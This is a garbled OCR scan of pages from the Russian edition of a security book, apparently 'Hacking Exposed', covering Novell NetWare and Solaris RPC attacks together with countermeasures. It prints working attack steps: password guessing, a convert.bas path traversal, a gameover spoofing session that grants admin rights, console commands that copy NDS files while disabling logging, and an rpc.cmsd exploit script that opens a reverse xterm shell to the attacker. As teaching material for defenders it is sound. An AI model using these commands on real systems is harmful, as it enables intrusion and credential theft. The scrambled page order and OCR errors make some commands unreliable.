Стюарт Мак-Клар, Джоел Скембрэй, Джордж Куртц. Секреты хакеров. Безопасность сетей - готовые решения
Подождите немного. Документ загружается.
I He
пытайтесь
применять утилиту
nwpcrack
к учетным записям администра-
торов, если включен режим блокировки вторжений. В противном случае может
быть заблокирована учетная запись за пределами дерева. Перед тестирова-
нием с помощью утилиты nwpcrack учетной записи ADMIN (или эквивалент-
ной) нужно создать ее резервную копию. В системе Windows NT не может воз-
никнуть подобного состояния
DoS,
поскольку в ней нельзя заблокировать ис-
ходную учетную запись администратора, если не используется дополнитель-
ная утилита из набора NTRK, passprop.
| Если с помощью утилиты nwpcrack будет обнаружен активный режим выявле-
ния
вторжений,
то вы
получите сообщение
tried
password
«пароль»
с
тем же паролем, выведенным повторно. Это будет свидетельствовать о том, что
сервер NetWare больше не будет принимать запросы на регистрацию от этого
пользователя. Тогда нужно нажать комбинацию клавиш <Ctrl+C>, чтобы выйти
из программы, поскольку в противном случае на консоли сервера появится хо-
рошо
знакомое
сообщение DS-5.73-32:
Intruder
lock-out
on
account
Ad-
min ("Блокирование вторжения для учетной записи Admin"). А это совсем не
входит в планы взломщика.
О
Контрмеры:
защита
от
утилиты
nwpcrack
Защититься от подбора пароля пользователей (скорее всего, администраторов) с
помощью утилиты nwpcrack очень просто. Вот некоторые рекомендации.
Т
Придерживайтесь
строгой политики использования паролей. Компания Novell не
предоставила простого решения этой проблемы. Ее позиция по этому вопросу
заключается в том, что администраторы могут ввести строгий режим использо-
вания паролей лишь посредством следования принятой политике обеспечения
безопасности. Это сильно отличается от позиции компании Microsoft, которая с
помощью динамически подключаемой библиотеки
passfilt.dll
позволяет
ограничить типы паролей, которые можно использовать, принудительно задавая
минимальную длину паролей
и
обязательные метасимволы (например,
!@#$%).
Как минимум нужно требовать, чтобы использовались пароли определенной
длины и не было повторений. Длину пароля проще всего контролировать с по-
мощью переменной
USER_TEMPLATE.
А.
Включите режим выявления вторжений и блокирование учетных записей. Выдели-
те нужный контейнер (organizational Unit), а затем выберите команду De-
tails. Щелкните на кнопке Intruder Detection и задайте для параметров требуемые
значения. По умолчанию рекомендуется установить следующие значения.
Detect intruders Включен
Incorrect login attempts 3
Intruder attempt reset interval (Days) 14
Intruder attempt reset interval (Hours) 0
Intruder attempt reset interval (Minutes) 0
Lock account after detection Включен
Intruder lockout reset interval (Days) 7
Intruder lockout reset interval (Hours) 0
Intruder lockout reset interval (Minutes) 0
лава 7. Хакинг Novell NetWare
311
Изъяны приложений
В терминах служб TCP/IP после установки системы NetWare по умолчанию исполь-
зуется лишь несколько открытых портов, включая Echo (7) и Chargen (19) — не очень
много для потенциальных атак (за исключением очевидной генерации состояния отказа
в обслуживании, DoS). Однако при добавлении служб Web, FTP, NFS и
telnet
появля-
ются новые открытые порты, такие как 53, 80, 111, 888, 893, 895, 897, 1031 и 8002.
При добавлении новых служб повышается и гибкость. Это, в свою очередь, приво-
дит к многочисленным изъянам, проявляющимся на протяжении многих лет, которые
могут быть использованы для получения авторизованного доступа.
N
О
/
я
bfJft
Сценарии Perl в системе NetWare
Популярность
Простота
Опасность
;
,
Степень риска
• 6
8
• 8
7
Первоначально проблема была обнаружена в начале 1997 года, так что если вы ис-
пользуете более ранние версии системы NetWare 4.x или
IntraNetWare,
то потери за-
щищенности может и не возникнуть. Однако суть проблемы заключается в том, что
взломщик может выполнять сценарии Perl из любого места тома, включая рабочие ка-
талоги пользователей
и
системные каталоги, такие
как
LOGIN
и
MAIL.
В результате вполне вероятно, что взломщику удастся создать сценарий на языке Perl,
позволяющий отобразить содержимое важных файлов в броузере, например
autoexec.
ncf или
Idremote.ncf,
в которых хранится пароль утилиты rconcole.
О Контрмеры: защита от сценариев Perl
К сожалению, предлагаемая контрмера далеко не идеальна и заключается в том,
чтобы либо полностью отказаться от использования службы, либо обновить ее до но-
вой версии. Другими словами, выполните одно из следующих действий:
Т введите на системной консоли команду unload perl
или
А,
обновите Web-сервер системы NetWare до версии 3.0; его самую
последним
версию можно загрузить
с
узла
по
адресу
http:
/
/www.
support.
novell.
com.
Служба FTP системы NetWare
Популярность
Простота
Опасность
Степень риска
6
8
8
7
Этот изъян средств поддержки FTP присутствует лишь в исходной
FTP-слу»
IntraNetWare. Конфигурационные параметры, используемые по умолчанию,
разреи
ют
анонимным пользователям доступ
File
Scan
к
каталогу
SYS-.ETC.
В
этом
катал<
содержится файл
netinfo.cfg
(и другие важные конфигурационные файлы).
312
Часть
II.
Хакинг
CHCI
Для того чтобы проверить, уязвим ли ваш сервер при использовании такого прие-
ма, выполните следующее.
1. В Web-броузере введите следующий адрес
URL:
ftp://ftp.server.com/
2. Если вам удалось получить анонимный доступ, попробуйте просмотреть каталог
SYS.-ETC.
Если
вы
смогли увидеть файлы
в
этом каталоге, значит,
ваш
сервер
уязвим.
О Контрмеры: защита службы FTP
Принципы защиты службы FTP системы NetWare аналогичны контрмерам по ис-
пользованию сценариев
Perl.
Необходимо либо запретить использование службы, ли-
бо обновить программное обеспечение.
Т Замените файл
ftpserv.nlm
на
его
более новую версию. Ее можно найти по
адресу
http://www.support.novell.com.
Ш
Запретите анонимный
FTP-доступ.
А Воспользуйтесь файлом
unicon.nlm
и удалите службу FTP.
ПИ
(Версия
ftpserv.nlm
для
системы
NetWare4.11
по
умолчанию запрещает
анонимный доступ пользователей.
Web-сервер NetWare
Популярность
Простота
Опасность
Степень риска
6
7
9
7
Об уязвимости Web-сервера системы NetWare стало известно в 1996 году. Более
ранние версии Web-сервера системы NetWare 4.x не способны проверять параметры,
передаваемые его файлу
convert.
bas сценариями на языке Basic. В результате
взломщики могут без проблем увидеть любой файл системы, включая
autoexec.ncf,
Idremote.ncf
и
netinfo.cfg.
Для проверки степени уязвимости вашего сервера вы-
полните следующие действия.
1. Воспользовавшись строкой ввода адреса URL Web-броузера, вызовите иссле-
дуемый сценарий
(convert.
bas) и передайте ему в качестве параметра имя
системного файла. Например,
http://www.server.com/scripts/convert.bas?../../system/autoexec.ncf
2. Если вы увидели содержимое файла
autoexec.ncf,
значит, Web-сервер уязвим.
О Контрмеры: защита Web-сервера NetWare
Выполните обновление до самой последней версии Web-сервера компании Novell,
обратившись
по
адресу
http:
//www.
support
.novell.
com,
или как
минимум
до
вер-
:ии
2.51
R1. Компанией
Novell
были исправлены сценарии Basic, содержащиеся в ка-
•алоге
SCRIPTS. Теперь с их помощью можно открыть лишь определенные файлы,
[еречень которых жестко ограничен.
ша
7.
Хакинг
Novell
NetWare
313
Ложные атаки (PANDORA)
Популярность
•
,
Простота
Опасность
Степень риска
;
t
.3 ,
7
10
7
НА
WEB-УЗЛЕ
Если
все
предыдущие попытки получения привилегий
администратора за-
кончились неудачей, то можно прибегнуть к нескольким ложным атакам с
применением пакетов NCP. Средства для осуществления таких атак разра-
ботаны в центре исследований
NMRC
(Nomad Mobile Research Center,
http://www.nmrc.org)
и называются Pandora
(http://www.nmrc.org/
pandora/download.html).
В настоящее время доступна версия 4.0, однако
в данной книге рассматриваются возможности версии 3.0. Для работы па-
кета Pandora необходимо выполнение нескольких обязательных условий.
Работа с сетевым адаптером должна осуществляться посредством связанного с
ним драйвера пакетов (packet driver). Такой драйвер имеется в комплекте постав-
ки лишь определенных сетевых адаптеров. Уточните у производителя, поддержи-
вается ли вашей NIC драйвер пакетов. Можете считать, что вам крупно повезло,
если ваш сетевой адаптер изготовлен такими производителями, как Netgear, D-
Link
и 3Com. Драйвер пакетов необходим также для перехвата прерывания 0x60.
Чтобы пакет Pandora мог функционировать, должна быть загружена поддержка
интерфейса DPMI (DOS Protected Mode Interface — интерфейс защищенного
режима DOS). Необходимые файлы можно загрузить с Web-узла, адрес кото-
рого приведен выше.
В дереве нужно найти контейнер, в котором содержится как объект Admin (или
с эквивалентными правами), так и пользователь, пароль которого известен.
^
gameover
Одного имени утилиты gameover вполне достаточно, чтобы узнать, для чего она
пред
назначена. Утилита gameover позволяет взломщику предоставить пользователю
привиле
гаи, эквивалентные администратору. Это достигается с помощью передачи серверу 4.
ложного
NCP-запроса,
в результате чего им будет обработан запрос SET EQUIVALENT то.
Для того чтобы установить клиента
DOS/Win95,
выполните следующие действия.
1. Перейдите в режим DOS.
2. Загрузите драйвер пакетов (например, производства компании D-Link):
dellxpd
0x60
3. Загрузите поддержку интерфейса
DPMI:
cwsdpmi
Теперь, воспользовавшись информацией о пользователе, полученной с помощ
приложения On-Site (рис. 7.7), можно приступить к своему "черному
делу".
314 Часть
II.
Хакинг
сис
-
О Контрмеры: защита от утилит Pandora
Для защиты от утилит из пакета Pandora существует много различных способов, и их
перечень во многом зависит от архитектуры узла NetWare. Вообще, для предотвращения
хакинга
с применением описанных средств нужно следовать следующим рекомендациям.
Т Никогда не помещайте пользователя Admin (или эквивалентного) в тот же кон-
тейнер, в котором содержатся другие пользователи.
• Установите самый новый пакет Support Pack 9, который можно найти по адресу
ftp://ftp.novell.com/pub/updates/nw/nw411/nw4sp9.exe.
При этом
файл DS .
NLM
будет замещен его новой версией. Ее можно свободно получить
по адресу
http://www.support.novell.com.
•
Перед запуском файла
DS.NLM
добавьте команду
SET
PACKET SIGNATURE
OPTION=3
либо
в
начало файла
autoexec.ncf,
либо
в
конец файла
startup.ncf.
А В
сценарии
autoexec.ncf
можно также вызвать сценарий
SYS:SYSTEM\
secure.ncf.
При этом для
того
же и нескольких других параметров будут уста-
новлены требуемые значения, однако снова убедитесь в том, что сценарий вы-
зывается в начале файла
autoexec.ncf.
Откройте файл
secure.ncf
и удалите
символы комментария в строке SET PACKET SIGNATURE OPTION=3.
Получив права администратора
на
сервере...
С этого момента самая тяжелая часть работы взломщика осталась позади. Теперь в
его распоряжении права администратора сервера и, скорее всего, значительная часть
дерева. Следующим шагом является получение доступа к утилите rconsole сервера и
сбор файлов NDS.
;&'
Хакинг утилиты
rconsole
Популярность
Простота
Опасность
Степень риска
8
10
10
9
Получить пароль к утилите rconsole можно несколькими способами, однако на
самом деле существует лишь один простой путь, который зависит от темперамента
администратора. По умолчанию пароль к утилите rconsole хранится в виде неза-
шифрованного текста. Это можно проверить следующим образом.
1. Просмотрите файл
SYS:
\SYSTEM\autoexec
.
ncf.
2. Найдите строку load remote. В качестве следующего параметра должен быть
указан пароль, который, возможно, будет представлять незашифрованный текст.
load remote ucantcme
3. Если после строки remote пароля нет, а вместо него указан параметр -Е, то вас
можно поздравить — как минимум, администратор зашифровал пароль утилиты
rconsole.
load remote -E 158470C4111761309539DO
316 Часть II. Хакинг систем
Запустите утилиту gameover следующим образом.
Gameover<cr>
Server internal net (4 bytes hex)
36FCC65D<cr>
Server address (6 bytes hex)
000000000001<cr>
File server connection number (int)
most probably
4'
(seen as:
<
*<server_name>.<server.context>')
4<cr>
Server socket high (1 byte hex)
most probably
MO'
40<cr>
Server socket low (1 byte hex)
Most probably
'07'
39<cr>
User name to gain rights (does NOT have to be currently connected)
eculp<cr>
User name to get rights from (does not have to be currently connected)
Admin<cr>
Spoofing:
Done.
После этого можно зарегистрироваться
в
качестве пользователя
ECULP
и
получить
права администратора. Здорово, не правда ли?
£to
Ы*
'_eJ_*P
Г
| В | ? | 'SECRET
Servers)
VoMRQs
Connections
|
Connections
<*
[Login
Id
РРДРВВЕЩЦ
•SECRET.HSS
ADMIN
ADMIN
ESTEIN
ESTEIN
NOT_LOGGED_IN
NOT LOGGED
IN
Locked
Files
Name
1
ConniC
5
7
8
2
3
1
Q
FileName
1 Servers
Г Node
'
[NodeAddr
мЩШИШИ
OOOOD0000001
OOBOOB9A69D4
0060089A89D4
0000861
CD947
0000861
CD947
0000861
CD947
000000000001
Name Spc j
; Connection
Information
Connection
#
Login Time
Network Address
Node
Address
Connection Type
Files Locked
Records
Locked
Bytes
Read
Bytes Written
Total
Requests
SECRET.HSS
4
4\10«9
16:3B:34
36FCC65D
000000000001
:4Ю9
Unknown
Unknown
Unknown
Unknown
Unknown
Unknown
Reload List
Ж
Message
1 Volumes
!8
connections
s
,,
Puc. 7.7. Для получения административных привилегий можно воспользо-
ваться данными о пользователе, полученными с помощью утилиты On-Site
В пакете Pandora содержится и много других утилит, заслуживающих внимания. Две
другие утилиты,
level
1-1 и
level3-1,
также предназначены
для
передачи ложных
NCP-запросов, как и gameover. Их использование также приводит к обработке запроса
SET
EQUIVALENT,
однако
при
этом объекты-пользователи могут располагаться
в
различ-
ных контекстах. Такую возможность в лабораторных условиях нам проверить не удалось.
Утилиты
extract, crypto
и
crypto2
предназначены
для
взлома паролей
NDS и
будут рассмотрены ниже в данной главе. Утилита havoc является прекрасным инст-
рументом для выполнения атаки DoS.
Глава 7. Хакинг Novell NetWare
315
Получение доступа к файлам NDS
Популярность
'»
,
Простота
Опасность
Степень риска
8
8
10
9
После приобретения пароля утилиты rconsole осталось выполнить завершающий
шаг — получить доступ к файлам NDS. В системе NetWare файлы NDS содержатся в
скрытом каталоге
_netware
тома SYS. Доступ к этому каталогу можно получить лишь
через доступ к консоли (для взломщика — утилите rconsole). Для "захвата" файлов
NDS существует много методов. И как вы скоро убедитесь, у каждого взломщика
имеются свои любимые приемы.
9
netbasic
.nlm
(SYS : SYSTEM)
Набор средств разработки программного обеспечения NetBasic (NetBasic Software De-
velopment Kit), который изначально был разработан компанией High Technology Software
Corp. (для краткости
HiTecSoft).
С его помощью можно конвертировать сценарии
NetBasic в формат NLM (NetWare Loadable Module) компании Novell и использовать их
на Web-сервере системы NetWare. Компонент
netbasic.nlm
имеет уникальную осо-
бенность, которая изначально была обнаружена взломщиками: с его помощью из ко-
мандной строки можно просмотреть весь том, включая скрытый каталог
„netware.
Средства NetBasic по умолчанию устанавливаются на всех серверах NetWare 4.x
так что их очень часто используют для получения доступа к файлам NDS. Кроме того
следует заметить, что средства NetBasic предоставляют возможность "изъятия"
тре
буемых
файлов без непосредственного использования службы каталога. Для этого вы
полните следующую последовательность действий и команд.
1. С помощью команды SYS:
\PUBLic\rconsole
получите доступ к
консоли
rconsole.
2. unload
conlog
(удаляет утилиту, регистрирующую консольные сообщения, и
oi
ключает
режим регистрации).
3. load
netbasic.nlm.
4. shell.
5. cd
Vnetware
(скрытый системный каталог, который можно увидеть только
системной консоли).
6. md \login\nds.
7. copy
block.nds
\login\nds\block.nds.
8. copy
entry.nds
\login\nds\entry.nds.
9. copy
partitio.nds
\logm\nds\partitio.nds.
10. copy value.nds \login\nds\value.nds.
11. exit (выход из оболочки).
12. unload netbasic.
13. load conlog (вновь загружаем утилиту регистрации).
318
Часть II.
Хакинг
сист
Однако упрямого взломщика это только приблизит к цели: получению
полного
контроля
над
системой. Хакер Мечтатель (Dreamer,
или
Разру-
шитель, TheRuiner) разобрался с алгоритмом, применяемым при шифро-
вании пароля утилиты rconsole, и написал исходный код на языке Pas-
cal, который можно использовать для получения этого пароля
(http://-
www.nmrc.org/files/netware/remote.zip).
Для расшифровки пароля
можно использовать также написанный авторами книги сценарий Perl,
который находится на Web-узле
www.hackingexposed.com.
Особенность использования этого сценария заключается в том, что нужно просто
найти пароль утилиты rconsole (неважно, зашифрованный или нет). Если у вас име-
ется много времени, которое вы готовы потратить на поиск этого пароля, то восполь-
зуйтесь следующими рекомендациями.
Т Если вы не обнаружили строку load remote в файле
autoexec.ncf,
не отчаи-
вайтесь; она может содержаться в другом файле NCF. Например, для хранения
команды load remote по умолчанию обычно используется файл
SYS:\
SYSTEMMdremote.ncf.
Этот файл также можно просмотреть и проверить, не
содержится ли в нем незашифрованный пароль.
А Если вы все еще не нашли строку load remote, то это может означать, что адми-
нистратор воспользовался командой inetcfg и перенес команды из файла
autoexec.ncf
в файлы
initsys.ncf
и
netinfo.cfg.
Оба файла содержатся в ка-
талоге
SYSrETC.
При
первом запуске программы
inetcfg
с
консоли
она
пытается
переместить все команды из файла
autoexec.ncf
в файл inetcfg. В результате в
этом файле пароль должен содержаться в том же виде, что и в файле
autoexec.
ncf.
(Контрмеры:
использование незашифрованных паролей
утилиты
rconsole
Предотвратить такую опасность очень просто. Компания Novell предлагает меха-
низм шифрования пароля утилиты rconsole с помощью команды remote encrypt.
Вот
что для этого необходимо сделать.
1.
Убедитесь,
что не
загружены утилиты
rspx
и
remote.
2.
Введите
с
консоли команду load remote
«пароль».
3. С консоли введите команду remote encrypt.
4. В ответ на появившийся запрос наберите пароль утилиты rconsole.
5. На экране появится запрос о том, нужно ли добавить зашифрованный пароль в
файл SYS:
\SYSTEM\ldremote.ncf.
Ответьте "да".
6. Удалите все строки с паролем из файлов
autoexec.ncf
и
netinfo.cfg.
7. Убедитесь, что для вызова команды load remote в файл
autoexec.ncf
добав-
лен файл
Idremote.ncf.
PRffl
j В настоящее время не существует модулей обновления, позволяющих защи-
титься
от
декодирования зашифрованных паролей утилиты
rconsole
(а-ля
Разрушитель!).
Для получения самой свежей информации по этому вопросу
регулярно
обращайтесь
по
адресу
http://oliver.efri.hr/~crv/
security/bugs/Others/nwarel2.html.
Сценарий Perl, позволяющий рас-
шифровать
этот
пароль
(reniote.pl),
можно
найти
на
нашем
Web-узле
www.hackingexposed.com.
лава 7.
Хакинг
Novell NetWare
317
ленное создание переполнения буфера в тот момент, когда эта служба пытается пре-
образовать запросы DMI В события SNMP (http:
//www:cert.org/advisories/CA-
2001-05.html).
В марте 2001 года атакам, основанным на использовании этого изъя-
на, впервые подверглись различные системы Solaris. При этом применялись самые
различные методы. Изъян службы snmpXdmid широко используется при атаках на
систему Solaris версий 6, 7 и 8. Для того чтобы определить, уязвима ли система для
подобных атак, выполните поиск служб RPC с регистрационным номером 100249.
[wave]#
rpcinfo
-p quake I grep 100249
100249 1
udp
32826
100249 1 tcp 32781
Если эти службы запущены в системе Solaris 6, 7 или 8, в которой не установлены
модули обновления, значит, эта система уязвима для этой атаки.
О Контрмеры: защита служб RPC
Лучшим методом защиты от удаленных атак является отключение всех служб RPC, в
использовании которых нет острой необходимости. Если же какая-то
RPC-служба
очень
важна для работы сервера, подумайте над установкой какого-либо устройства управле-
ния доступом, с помощью которого связь с необходимыми портами RPC можно было
бы разрешить только строго определенным узлам. В некоторых случаях эта задача может
оказаться весьма непростой. Подумайте также над включением режима, запрещающего
выполнение стека, если такой режим поддерживается вашей операционной системой.
Наконец, попробуйте использовать Secure RPC, если имеющаяся в вашем распоряже-
нии версия
UNIX
поддерживает такие средства. Secure RPC обеспечивает дополнитель-
ный уровень аутентификации, основанной на шифровании по открытому ключу. Пом-
ните, что Secure RPC — это не панацея, поскольку многие разработчики UNIX не под-
держивают этого протокола. Другими словами, при использовании протокола Secure
RPC повышается безопасность, но под угрозой может оказаться взаимодействие. Нако-
нец, убедитесь в том, что установлены все самые последние модули обновления, разра-
ботанные поставщиком используемой вами системы. Модули обновления, призванные
устранить упоминавшиеся выше изъяны, можно найти по следующим адресам.
Т
rpc.
ttdbserverd.
http://www.cert.org/advisories/CA-98.ll.tooltalk.html
•
rpc.cmsd.
http://www.cert.org/advisories/CA-99-08-cmsd.html
•
rpc.statd.
http://www.cert.org/advisories/CA-99-05-statd-automountd.html
•
sadmind.
http://www.cert.org/advisories/CA-2001-ll.html
A snmpXdmid.
http://www.cert.org/advisories/CA-2001-05.html
NFS
Популярность
Простота
Опасность
Степень риска
8
9
8
8
В документах компании Sun Microsystems можно встретить такое определение:
"Сеть — это и есть компьютер". Действительно, возможности компьютера, не под-
ключенного к сети, гораздо
уже,
чем его собрата, включенного в локальную или гло-
бальную сеть. Возможно, именно из-за этого сетевая файловая система (NFS — Net-
356 Часть II. Хакинг систем
прежнему оказываются незащищенными против этого изъяна и в настоящее время!
Выше были описаны лишь несколько проблем, которые могут возникнуть при поддерж-
ке механизма RPC. Благодаря распределенной природе служб RPC и сложности их ком-
понентов, этот механизм часто является жертвой злоумышленников, что и продемонст-
рировано в следующем фрагменте.
[rumble]*
cmsd.sh
quake 192.168.1.11 2
192.168.1.103
Executing
exploit...
rtable_create worked
clnt_call[rtable_insert]:
RPC:
Unable
to
receive;
errno
=
Connection
reset
by peer
Как показано ниже, эту атаку позволяет упростить простой сценарий оболочки, в
котором вызывается утилита
cmsd.
При этом необходимо знать имя удаленного узла.
В рассматриваемом примере таким именем является quake. Кроме того, используется
IP-адрес этого узла,
192.168
.1.11,
а также тип системы (2), что эквивалентно систе-
ме Solaris 2.6. Эта информация оказывается чрезвычайно важной, поскольку утилита
"приспосабливается" к каждой конкретной системе. И наконец, мы указали также IP-
адрес компьютера взломщика
(192.168.1.103)
и установили обратный канал с ис-
пользованием программы
xterm
(рис. 8.2).
*
uname
-а
SunOS quake
5.6
Generic s
A
uid=0(root)
9id=0<root>
»D
n4m
spare
SUNU,SPftRCstation-20
Puc.
8.2. Окно xterm, появившееся в результате использования
изъяна
службы
rpc.cmsd.
Этого же результата можно достиг-
нуть
при
использовании
служб
rpc.
ttdbserverd
или
rpc.
statd
#!/bin/sh
if [
$#
-It
4
];
then
echo "Rpc.cmsd buffer overflow for Solaris 2.5 &
2.6
7"
echo "If
rpcinfo
-p target_ip
Igrep
100068 = true - you
win!"
echo
"Don't
forget to xhost+ the target system"
echo
""
echo "Usage: $0
target_hostname
target_ip <O/S version
(1-7)>
your_ip"
exit 1
~~
fi
echo "Executing
exploit..."
cmsd -h $1
-c
"/usr/openwin/bin/xterm
-display $4:0.0
&"
$3 $2
snmpXdmid
При обсуждении служб RPC заслуживает внимания также служба snmpXdmid. В
системе Solaris эта служба используется для преобразования событий
SNMP
в запросы
DMI
(Desktop Management Interface) и наоборот. В службе snmpXdmid возможно уда-
Глава
8.
Хакинг
UNIX
355